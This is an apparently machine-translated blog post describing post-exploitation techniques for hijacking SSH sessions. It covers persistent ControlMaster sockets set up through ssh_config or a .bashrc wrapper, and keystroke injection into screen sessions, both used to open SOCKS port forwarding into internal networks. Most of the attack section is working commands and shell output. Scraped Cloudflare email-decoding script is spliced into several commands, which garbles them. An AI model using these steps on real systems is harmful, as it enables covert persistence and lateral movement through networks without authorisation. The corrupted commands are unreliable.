Hijack SSH session injection port forwarding

Hijack SSH session injection port forwarding
0x00 Preface

Yesterday, the links in A niuba group were actually suitable for leaving backdoors. They belong to the Post Exploitation stage. I have never used this method before. They are all dumpfounded and used ld_preload backdoors, after the test is passed in the actual environment, if it finds that the test is available and has more practical value, let's take a look at some of the errors.

0x01 details 1.1 scenario 1:

The attack process is as follows: the SSH client (ssh_user) connects to ipv_1, And the attacker (attacker) can control the ssh_user machine. Attackers can inject port forwarding to intrude networks after ipv_1 and ipv_2. The procedure is as follows:

1. attackers can modify the ssh client in two ways. If you have the ROOT permission, you can directly modify the/etc/ssh/ssh_config file. If you do not have the permission to modify the ssh_config file. use ssh in bashrc. The main items involved are as follows:

ControlPath /tmp/%r@%h:%pControlMaster autoControlPersist yes

If ControlPersist is enabled, the user can hijack the session even if the session is exited after an SSH connection, because the file will not be deleted.

2. When (ssh_user) is connected to ipv_1 (192.168.56.131), a socket file is generated in the/tmp directory. We use

ssh -S /tmp/root@192.168.56.131<script cf-hash="f9e31" type="text/javascript">/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>\:22 %h

To connect

The command for injecting command port forwarding is as follows:

ssh -O forward -D 8888 -S /tmp/root@192.168.56.131<script cf-hash="f9e31" type="text/javascript">/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>\:22 %x

After executing this command, we can use port 8888 of the ssh_user machine as the SOCKS5 proxy to access the CIDR block after ipv_2.

3. As mentioned earlier, if ControlPersist is yes, the sockets file will not be automatically deleted. We can manually rm delete/tmp/root@192.168.56.131: 22, or use it elegantly.

root@kali: # ssh -O exit -S /tmp/root@192.168.56.131<script cf-hash="f9e31" type="text/javascript">/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>\:22 %x

.

The method for encapsulating the ssh command in. bashrc is as follows:

ssh () {     /usr/bin/ssh -o "ControlMaster=auto" -o "ControlPath=/tmp/%r@%h:%p" -o "ControlPersist=yes" "$@";}

1.2 Scenario 2:

This is the case when ssh_user uses screen to manage ssh sessions. The steps are as follows:

1. When ssh_user is used

screen ssh root@192.168.56.131<script cf-hash="f9e31" type="text/javascript">/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>

 

When you connect to the remote terminal _1 (192.168.56.131), the corresponding file is displayed in/var/run/screen.

root@kali:~# ls -la /var/run/screen/total 0drwxrwxr-x  3 root utmp  60 Mar 16 03:37 .drwxr-xr-x 20 root root 640 Mar  3 21:23 ..drwx------  2 root root  60 Mar 16 04:21 S-root

Where the S-ROOT represents a remote connection from a local root user, you can use screen-r root/to take over the session, or use screen-x 6851. pts-0.kali.

2. If you want to inject port forwarding, you must first execute script/dev/null to bypass the pts/tty limit. The command is as follows:

 

root@kali:~# lsof -i TCP:8888root@kali:~# script /dev/null Script started, file is /dev/nullroot@kali:~# screen -S 6851.pts-0.kali -p 0 -X  stuff $'~C'root@kali:~# screen -S 6851.pts-0.kali -p 0 -X  stuff $'-D:8888\n\n'root@kali:~# lsof -i TCP:8888COMMAND  PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAMEssh     6852 root    7u  IPv4  94301      0t0  TCP *:8888 (LISTEN)ssh     6852 root    8u  IPv6  94302      0t0  TCP *:8888 (LISTEN)

The ssh session injected into screen has a bad point, that is, the command you typed will be displayed at the same time as the currently connected user, which is easy to detect.